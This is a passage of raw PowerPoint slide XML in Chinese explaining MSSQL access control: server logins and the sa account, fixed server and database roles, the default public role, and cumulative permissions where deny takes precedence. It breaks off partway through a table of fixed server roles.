            </a:pP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用户、角色、机构的关系：数据库用户对应于服务器登录名以便登录者可以操作数据库。数据库角色可以添加，可以定制不同权限数据库架构，类似于数据库对象的命名空间，用户通过</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架构访问数据库对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421640" y="1420707"/>
            <a:ext cx="10779760" cy="81823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marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>数据库中有两个很重要的角色，分别是服务器角色和数据库角色，接下来从服务器和数据库的角度，对角色和用户做详细解释</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309034" y="2711874"/>
            <a:ext cx="5782733" cy="340355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marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器角度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器登录名：指有权限登录到某服务器的用户，可以在有权限的情况下创建新的登录名，超级管理员的登录名是sa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>：指一组固定的服务器用户，默认有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>组。针对</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>行整个数据库服务器设定的角色和权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器登录名和角色的关系：登录名一定属于某些角色，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>。服务器角色不允许更改，登陆后也不一定有权限操作数据库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>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846667" y="2996354"/>
            <a:ext cx="10498667" cy="340355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marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pP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举例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">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如果一个用户</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指定了服务器角色</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，那这个用户</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对服务器某些操作就有了一定权限</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，比如说执行系统命令、管理服务器磁盘、开机关机等等，如果不指定具体角色，默认为</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public</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角色</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">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如果一个用户</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指定了数据库角色</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，那这个用户</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在mssql数据库中的某个或某几个数据库就有了管理权限</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，例如有最高管理权限、只可读权限、只可写权限等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">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注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果某个账号只指定的服务器角色，没有指定数据库角色，该账号还是对数据库有绝对操作的权利。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Title 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143840" y="335251"/>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权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846667" y="1794934"/>
            <a:ext cx="11348720" cy="82239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marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里一个用户最终的权限应该是由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>组成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这三个级别的权限是累加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拒绝权限是优先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694267" y="944880"/>
            <a:ext cx="9965267" cy="36932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defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>MSSql中角色和用户的详细解释：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRP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24840" y="1354667"/>
            <a:ext cx="10498667" cy="81823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marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于固定服务器是在服务器层次上定义的，因此它们位于从属于数据库服务器的数据库外面。下表列出了所有现有的固定服务器角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Title 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143840" y="335251"/>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权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624841" y="988907"/>
            <a:ext cx="6882553" cy="36932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marL="380990" indent="-380990" defTabSz="1219170" hangingPunct="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>固定服务器角色？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481808974"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="624840" y="3239802"/>
          <a:ext cx="6374553" cy="2629291"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1690793">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4683760">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="393856">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>固定服务器角色</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="257588">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sysadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>执行SQL Server中的任何动作</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        <a:sym typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="286209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>serveradmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>配置服务器设置</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="271899">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
